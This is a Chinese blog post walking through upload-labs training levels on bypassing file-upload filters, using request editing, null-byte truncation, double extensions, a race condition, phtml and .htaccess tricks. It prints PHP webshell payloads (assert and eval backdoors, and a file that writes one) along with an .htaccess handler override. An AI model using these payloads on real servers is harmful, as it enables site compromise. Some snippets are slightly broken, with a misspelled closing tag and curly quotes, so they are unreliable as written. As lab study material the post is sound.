赞
踩
测试环境:uploadlabs
即大家说的js验证,突破js验证,无非就是禁用js,抓包后修改。下面是演示过程(uploadlabs第一关):
1.看源代码可以得知,这里的js验证的是白名单。如果不禁用js,所以要上传一个白名单后缀的文件,抓包后在修改。
2.上传图片马haidi.jpg,抓包,修改成haidi.php,即可
上传成功,返回文件地址
3.0X00,(第十三关):同上,不同之处在于%00是GET方式,0X00是POST方式。抓包修改,路径为:upload/haidi.php+,这里要将+号,编译成十六进制的00。
<script language=‘php’>assert($_REQUEST[‘cmd’])</script>
只进行了一次验证,(第十一关),双写后缀名绕过。
查看源代码发现,验证方式为先上传保存,在进行验证,验证不通过再删除,(第十八关),使用burpsuite不断上传一个内容为
<?php fputs(fopen('haidi.php','w'),'<?php @eval($_POST["x"])?>');?>
的php文件,在上传的过程中不断去访问这个php文件,就会在路径下生成haidi.php的后门文件。
中间件可以支持其他格式的文件解析,如Apache 能支持php5,phtml等,可在Apache httpd.conf 配置文件进行设置。(第三关),抓包,修改后缀名为“phtml”即可。
在Apache中存在.htaccess文件,简单讲就是在改文件中可以定义将满足某种条件的文件按照你想要的后缀格式解析。(第四关)先上传.htaccess文件,.htaccess内容为:
<FilesMatch "haidi.jpg">
SetHandler application/x-httpd-php
</FileMatch>
在上传图片马‘haidi.jpg’,访问图片马,Apache就会以php格式来解析该图片。
启用.htaccess,需要修改httpd.conf,启用AllowOverride,并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。
解析漏洞是指服务器应用程序在解析某些精心构造的后缀文件时,会将其解析成网页脚本,从而导致网站的沦陷。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。